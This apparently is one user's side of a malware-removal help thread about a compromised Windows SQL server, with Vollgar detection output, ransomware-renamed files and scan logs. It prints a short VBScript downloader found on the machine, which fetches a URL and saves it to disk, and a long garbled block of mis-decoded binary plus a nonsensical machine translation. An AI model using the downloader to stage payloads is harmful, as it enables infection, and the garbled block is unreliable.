AlinTech

I m the only it specialist.. The server is compromised. I backup and export the dbs and i create a new vm Thank you very much for support sir! Thank you for your time! Best regards.

S C:\Users\PitSoft\Downloads\labs_campaigns-master\labs_campaigns-master\Vollgar> .\detect_vollgar.ps1 Security warning Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning message. Do you want to run C:\Users\PitSoft\Downloads\labs_campaigns-master\labs_campaigns-master\Vollgar\detect_vollgar.ps1? [D] Do not run [R] Run once Suspend [?] Help (default is "D"): r Vollgar Campaign Detection Tool Written By Guardicore Labs Contact us at: labs@guardicore.com [V] Vollgar's malicious service SQLAGENT MSSQL SQLIOSIMSA was not found on this host. [V] Vollgar's local user IUER_SERVER was not found on this host. [V] No malicious payloads were found. [V] No malicious scheduled tasks were found. [V] No evidence for the Vollgar campaign has been found on this host. PS C:\Users\PitSoft\Downloads\labs_campaigns-master\labs_campaigns-master\Vollgar>

If you what remote control tell me and i give you. thank you for support

https://www.virustotal.com/gui/file/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/detection Its not true, check the community tab. And the file appear its scanned in 2020-04-11 21:29:47 UTC

yes, this is the content. on error resume next with wscript:if .arguments.count<2 then .quit:end if set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") web.open "get",.arguments(0),0:web.send:if web.status>200 then quit aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with ---------------------------- i found in C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1048-7B44-AC0F074E4100} this files: abcpy.ini.id-58D92ED6.[datadecrypt@qq.com].ETH setup.ini.id-58D92ED6.[datadecrypt@qq.com].ETH I found in C:\ProgramData\DataFiles\Microsoft\Fonts this files: CSCDA59.tmp, CSCEFB6.tmp, m2017.bat, m2017.exe, up.cs The content m2017.bat is: '&MZ?  ? @ ? ???L?This program cannot be run in DOS mode.਍汣൳㨊湏䔠牲牯删獥浵⁥敎瑸਍☧摣⼠⁤┢摾ば•挦捳楲瑰ⴠ㩥扶⁳┢晾∰栠瑴㩰⼯〲⸹㌱⸵㐱⸰㈱㨹〸〸眯睷氯确是摶൬✊挦捳楲瑰ⴠ㩥䉖捓楲瑰䔮据摯⁥稢硸種灩•瑨灴⼺㈯㤰ㄮ㔳ㄮ〴ㄮ㤲㠺㠰⼰睷⽷湬⽸癦汤㔠㤷㘵㠲㜴਍☧敤稢硸種灩☢敤┢晾∰䔦楸൴挊牵敲瑮慰桴㴠挠敲瑡潥橢捥⡴匢牣灩楴杮䘮汩卥獹整佭橢捥≴⸩敇䙴汩⡥獗牣灩⹴捓楲瑰畆汬慎敭⸩慐敲瑮潆摬牥倮瑡൨搊浩砠区瑥砠㴠挠敲瑡潥橢捥⡴档⡲㜸⬩档⡲〱⤵挫牨ㄨ〱⬩档⡲㈷⬩档⡲ㄱ⤶挫牨ㄨ㘱⬩档⡲ㄱ⤲挫牨㐨⤶挫牨㠨⤷挫牨ㄨ㔰⬩档⡲ㄱ⤰挫牨㜨⤲挫牨ㄨ㘱⬩档⡲ㄱ⤶挫牨ㄨ㈱⬩档⡲㈸⬩档⡲〱⤱挫牨ㄨ㌱⬩档⡲ㄱ⤷挫牨ㄨ㄰⬩档⡲ㄱ⤵挫牨ㄨ㘱⬩档⡲㘴⬩档⡲㌵⬩档⡲㘴⬩档⡲㤴⤩਍楤㩢敓⁴⁢‽牣慥整扯敪瑣挨牨㘨⤵挫牨ㄨ〰⬩档⡲ㄱ⤱挫牨ㄨ〰⬩档⡲㠹⬩档⡲㘴⬩档⡲㌸⬩档⡲ㄱ⤶挫牨ㄨ㐱⬩档⡲〱⤱挫牨㤨⤷挫牨ㄨ㤰⤩਍⹸灏湥挠牨㜨⤱挫牨㘨⤹挫牨㠨⤴圬捓楲瑰䄮杲浵湥獴〨Ⱙ㨰⹸敓摮眺瑩⁨㩢琮灹⁥‽㨱漮数㩮眮楲整砠爮獥潰獮䉥摯㩹献癡瑥景汩⁥畣牲湥灴瑡⁨‫尢硺⹸楺≰㈬⸺汣獯㩥湥⁤楷桴 in EN: '& MZ? ? @? ??? L? This program cannot be run in DOS mode. It ’s true that it ’s true that it ’s true that it ’s the most important thing, but it ’s the most important thing. It ’s a good thing.滟 灴 缴 ⼺ ㈰ ㄰ ㄮ 㔳 ㄮ 〴 ㄮ 㤲 㠺 㠰 ⼰ 睷 ⽷ 潬 罸 晦 汤 㔠 㤷 㘵 㠲 㜴 ਍☧ 敤  稢 ☸ Do you want to do it? Do you want to do it? Do you want to do it? Do you want to do it? Do you know how to do it? Do you want to do it?砠 区 瑥 砠 㴠 Tang 摡 摥 戥 捥 ⡴ File ⡲ 㜸 ⬩ 文件 ⡲〱⤵ 梨 牨 ㄨ 〱 ⬩ 文件 ⡲㈷⬩ 文件 ⡲ ㄱ ⤶ 梨 牨 ㄨ 㘱 ⬨File ⡤ Frustration ℩ ⬩ file ⡲ ㄱ ⤰ Frustration 㜨 ⤲ Frustration ㄨ 㘱 ⬩ file ⡲ ㄱ ⤶ Frustration 焨 ㄨ ㈱ ⬩ file ⡲ ㈸ ⬩ file ⡲ 〱 ⤱ ㄨ ℱ ℨ ⡲ ㄱ ⤵ Frustration ㄨ 㘱 ⬩ file ⡲ 㘴 ⬩ file ⡲㌵⬩ file ⡲ 㘴 ⬩ file ⡲ 㤴 ⤩਍ 楤  㩢 敓 ⁴⁢‽ It's a bit of a frown, and it's a frustration. It's a file ⡲ ㄱ ⤱ Frustration ㄨ 〰 ⬩ file ⡲ 㠹 ⬩ file ⡲ 㬴 ⬩ file ⡲ ㌸ ⬩ file ⡲ ㄱ Ⅎ ℤ牨 㤨 ⤷ 梨 牨 ㄨ 㤰 ⤩਍⹸ 灏 湥 牨 眨 㜨 ⤱ 梨 牨 㘨 ⤹ 梨 牨 㠨 ⤴ 圬 捓 楲 瑮 焮 杲 浵 湥 獰 Ⱙ㨱 漮 数 㩮 眮 楲 杮 砠 獮 獝 牝 牥 䉥 sincerely dedicate to idiot 瑥 景 汩 ⁥ 畣 鮥 灴 瑡 ⁨‫ 尤 硺 ⹸ 楺 ≰㈬⸺ 汣 獯 㩥 i found in C:\ProgramData\MySQL\MySQL Server 5.5\data\mysql view in attach I dont found any vbs files. Thank you

Sure. usdta.zip

Thanks EventLogs.zip

Question: Is this machine in a business-network or home-network type setting? A: Business-network Q: Is this same system serving multiple simultaneous users ? or just yourself ? A: multiple simultaneous users --------------------------------------------------------- i don't use Internet Explorer but i know viruses use it to download infected files. Thank you very much for support. mbar-log-2020-04-11 (22-05-01).txt AdwCleaner[S01].txt Search.txt

This is my BGP log with AiProtection - Infected Device Prevention and Blocking IntrusionPreventionSystem .csv MaliciousSitesBlocking.csv

Internet Explorer history , i found something strange view in attach

in ProgramData i found this: SQLAGENTVDC.exe usdta.vbs in attach i opened with edit https://www.virustotal.com/gui/file/656c6324142ebbc7184792130f9299c6e2a0bfc451f2609ca5947d2bcc5cb288/detection New Text Document.txt

Yes, i have enabled Audit Process Creation and Include command line in process creation events. exactly as in the documentation.

Thank you This is eset log. esetlog.txt

Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>sfc /scannow Beginning system scan. This process will take some time. Beginning verification phase of system scan. Verification 100% complete. Windows Resource Protection did not find any integrity violations. C:\WINDOWS\system32> Now, i start the full scan with eset online Thx

Hi, thank you sir. Fixlog.txt